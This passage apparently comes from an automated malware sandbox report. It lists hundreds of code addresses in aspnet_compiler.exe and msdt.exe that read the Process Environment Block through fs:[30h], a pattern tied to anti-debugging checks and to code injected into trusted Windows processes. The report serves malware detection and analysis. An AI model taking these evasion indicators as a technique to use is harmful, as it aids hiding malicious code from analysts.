          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01473884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01423B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014A23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014A23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014AD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01401B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01422397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01424BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014BEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01484257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0143927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01408A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01413A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01434A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01422ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01422AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0140AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01433D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01473540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014A3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01417D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0147A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01476DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0140D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0148C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0141B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_0142BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_014B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 7_2_01476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01408794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01407E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01428E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01438EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05523D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05497D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0549C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05548D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0547AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054FA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05483D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054F6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_05528DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0548D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0553FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054A2581 mov eax, dword ptr fs:[00000030h]
